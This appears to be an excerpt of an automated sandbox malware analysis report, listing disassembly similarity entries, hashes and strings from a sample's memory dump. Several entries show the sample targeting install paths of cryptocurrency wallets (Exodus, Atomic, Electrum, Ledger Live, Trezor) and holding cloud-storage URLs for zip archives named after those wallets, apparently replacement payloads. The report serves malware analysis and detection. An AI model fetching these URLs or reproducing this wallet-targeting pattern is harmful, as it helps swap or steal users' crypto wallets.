                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                                                          • Opcode ID: 3d47ef9bc52971a2eb8f9da7c71ac82cef6ca133624d0f3e8089cfb8152a00f3
                                                                                                                                                                          • Instruction ID: 64166827f10768ded365221a1f0306b8f9d806a45134617ee3dc0eb9433260a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d47ef9bc52971a2eb8f9da7c71ac82cef6ca133624d0f3e8089cfb8152a00f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 33B2E572E192868BE7249F68D460FFDB7A1FB48348F912135DA0D57AB4DB3CA900CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                          • String ID: Duplicate key: '$Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name$keylength >= 2^30
                                                                                                                                                                          • API String ID: 3936042273-466942808
                                                                                                                                                                          • Opcode ID: 3cad9e80d418702ae9d8d0f5d03c02ba6875ec042c3b9f5c2d82beb56eb7ae27
                                                                                                                                                                          • Instruction ID: ded9a86d6181f7eb79d4ed3095789c8854bfe1bb6a709d25d288f40ab2fc31d7
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cad9e80d418702ae9d8d0f5d03c02ba6875ec042c3b9f5c2d82beb56eb7ae27
                                                                                                                                                                          • Instruction Fuzzy Hash: 8F92DF22F1A74641FA14BB29C455BBDA361EF81B84FC25131DE5E1B6FADE3CE5808720
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: allowComments$allowDroppedNullPlaceholders$allowNumericKeys$allowSingleQuotes$allowSpecialFloats$allowTrailingCommas$collectComments$failIfExtra$rejectDupKeys$skipBom$stackLimit$strictRoot
                                                                                                                                                                          • API String ID: 0-1055134397
                                                                                                                                                                          • Opcode ID: 44472f6b8c109f133b6386ed5293b7edd309c8dfcdbc1d072817c25bb38187e4
                                                                                                                                                                          • Instruction ID: f277d3720d11efbb935f8f03b5291e367461cfd938145d859472e9c62dbee567
                                                                                                                                                                          • Opcode Fuzzy Hash: 44472f6b8c109f133b6386ed5293b7edd309c8dfcdbc1d072817c25bb38187e4
                                                                                                                                                                          • Instruction Fuzzy Hash: C0329711B2A11245FF18FA29D865FFED362AF81B44FC64035DD0E1BABADE2DE5048760
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: All$commentStyle$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$precision$precisionType$significant$useSpecialFloats
                                                                                                                                                                          • API String ID: 0-3087533615
                                                                                                                                                                          • Opcode ID: 187c93caa7a0e9c674156f24fab7250a42805792a85248b1df0cf1491178bd0e
                                                                                                                                                                          • Instruction ID: 3705f7b3e25f8b86fe0ec270bfeb271418dac6257c041b0d02ae48ce7c2c7e45
                                                                                                                                                                          • Opcode Fuzzy Hash: 187c93caa7a0e9c674156f24fab7250a42805792a85248b1df0cf1491178bd0e
                                                                                                                                                                          • Instruction Fuzzy Hash: D2E17525B2A61241FB08FB69D865FFED361AF41B44FC55031ED0E17ABACE2DE5098360
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Atomic Wallet$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                          • API String ID: 73155330-2810031701
                                                                                                                                                                          • Opcode ID: 0b0eae0df0b642124a01642c28ce6e5018401797484e5388a46f1f98566f7dd3
                                                                                                                                                                          • Instruction ID: b0c9a3262d90a90a37da5fe4be51a1058ddd867b0be1f5392fd05622b677f2de
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b0eae0df0b642124a01642c28ce6e5018401797484e5388a46f1f98566f7dd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D619552E25BC691E700EB38D8917B9A321BBEA348F915335F58C62576EF6CF284C710
                                                                                                                                                                          Strings
                                                                                                                                                                          • https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1, xrefs: 00007FF7ABC01B5A
                                                                                                                                                                          • Trezor, xrefs: 00007FF7ABC01AE8
                                                                                                                                                                          • https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1, xrefs: 00007FF7ABC01BA6
                                                                                                                                                                          • https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1, xrefs: 00007FF7ABC01AC2
                                                                                                                                                                          • https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1, xrefs: 00007FF7ABC01A72
                                                                                                                                                                          • Atomic, xrefs: 00007FF7ABC01A9B
                                                                                                                                                                          • https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1, xrefs: 00007FF7ABC01B0E
                                                                                                                                                                          • Electrum, xrefs: 00007FF7ABC01B80
                                                                                                                                                                          • Exodus, xrefs: 00007FF7ABC01A49
                                                                                                                                                                          • Ledger Live, xrefs: 00007FF7ABC01B34
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Atomic$Electrum$Exodus$Ledger Live$Trezor$https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1$https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1$https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1
                                                                                                                                                                          • API String ID: 73155330-3394481700
                                                                                                                                                                          • Opcode ID: f8a4a3bd6e484db3f333ee16ad722e09342c2504e0c31919c4b3dd24519f3831
                                                                                                                                                                          • Instruction ID: eb5baa611a42b4930b476972469bb27e7bd8c65b22b995892a48c26eac8d8e46
                                                                                                                                                                          • Opcode Fuzzy Hash: f8a4a3bd6e484db3f333ee16ad722e09342c2504e0c31919c4b3dd24519f3831
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51A452E25B8645E700EB38D8517B9A321BBDA348F916336F58C62876EF7CB1C0C750
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                          • API String ID: 3069159798-905460609
                                                                                                                                                                          • Opcode ID: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                          • Instruction ID: 594aa9289987c0ec4a18c7693a50228417a3a40ec67888bee482a9160048fd64
                                                                                                                                                                          • Opcode Fuzzy Hash: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                          • Instruction Fuzzy Hash: AD919631A0A78281E724BB1DD461EB9A3A4FF88B80F865131DA4D477B6DF3CE551C322
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2591520935-0
                                                                                                                                                                          • Opcode ID: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
                                                                                                                                                                          • Instruction ID: d5df198be85594c6ce2652fb43ba57c0679039655902f074d5044999aa92eb28
                                                                                                                                                                          • Opcode Fuzzy Hash: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
                                                                                                                                                                          • Instruction Fuzzy Hash: CF717F22F1665285FB50BB68D860EBCB3A4BF4C748F865135CA1D536B5EF3CA445C322
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                          • Opcode ID: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                          • Instruction ID: 07aad611f16254c596d73e43627cc47ea9f7860ac7d8e4fda621a8134e99a45e
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                          • Instruction Fuzzy Hash: FC31727260AB8186EB609F64E8847EDB365FB84704F81403ADA4E47BB5DF3CC648C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                          • Opcode ID: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                          • Instruction ID: 5922bc36fa0ec2e701e5e8d7308e06ce14765f78fc9845f62aa2242cec0bb1cf
                                                                                                                                                                          • Opcode Fuzzy Hash: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 0031A232619B8186DB60DF29E844AAEB3A5FB88754F910136EA8D43BB4DF3CC555CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: ' is not a number.
                                                                                                                                                                          • API String ID: 3668304517-698141950
                                                                                                                                                                          • Opcode ID: d1709e9c43e06dfda3d09e045e85fb04cb24677060ca0620f299f26726303a2c
                                                                                                                                                                          • Instruction ID: bf7ed04781e57e89df40a5869afbec54c1a7159362c6a842b87fd51c597036b6
                                                                                                                                                                          • Opcode Fuzzy Hash: d1709e9c43e06dfda3d09e045e85fb04cb24677060ca0620f299f26726303a2c
                                                                                                                                                                          • Instruction Fuzzy Hash: F9D1E223E15B8185EB10EB78D440BADB761FB85798F915236EE5C17ABADF38E180C700
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                          • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                          • API String ID: 593203224-1108341528
                                                                                                                                                                          • Opcode ID: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
                                                                                                                                                                          • Instruction ID: 227f403d0e01fe674823b36d02eaa52eed72919c6a9320745564a222e330957a
                                                                                                                                                                          • Opcode Fuzzy Hash: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
                                                                                                                                                                          • Instruction Fuzzy Hash: C9E29F72A0E68189EB55AF2DD05467CF7A1AB01F88FD98131DA5D4B3B5CE3DD84AC320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7ABC423CB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                          • API String ID: 389471666-631824599
                                                                                                                                                                          • Opcode ID: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                          • Instruction ID: 04390edf6b84045e986bb1e0b97a2bc7f8ecfed1a2b00a009d5278b0f2c9a31f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                          • Instruction Fuzzy Hash: CA119132615B42A7F744AB2AD5557B9B2A5FF04345F814134C64D46A70EF7CE4B4C720
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Atomic$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                          • API String ID: 73155330-2331485672
                                                                                                                                                                          • Opcode ID: a8f77f9f309beedd2d7a6fb9237a85cd204fb79b959dea2a03a3b4b8bfaff198
                                                                                                                                                                          • Instruction ID: 3695eaa1591a776c9e1464c07d257697b8c91a78d7f33854e14b10400c152a69
                                                                                                                                                                          • Opcode Fuzzy Hash: a8f77f9f309beedd2d7a6fb9237a85cd204fb79b959dea2a03a3b4b8bfaff198
                                                                                                                                                                          • Instruction Fuzzy Hash: 6371F622F25B9581E700EB79D8416BEA371FB99784F955232EE4C236A5DF7CE580C310
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC36B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC36B9B
                                                                                                                                                                            • Part of subcall function 00007FF7ABC36B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC36BC0
                                                                                                                                                                            • Part of subcall function 00007FF7ABC36B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC36BEA
                                                                                                                                                                            • Part of subcall function 00007FF7ABC36B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC36C7B
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC35712
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC35718
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                          • API String ID: 4156930308-2799312399
                                                                                                                                                                          • Opcode ID: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
                                                                                                                                                                          • Instruction ID: 4a19ead4508cc95ac15bb882e3d46c66cc322017356e544028bfc884cd733a5f
                                                                                                                                                                          • Opcode Fuzzy Hash: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
                                                                                                                                                                          • Instruction Fuzzy Hash: 91728372A0A68189EB59AF2DC05477CF7A1AB01F58FDA8131CA5D4B3B5CE2DD849C360
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2933794660-0
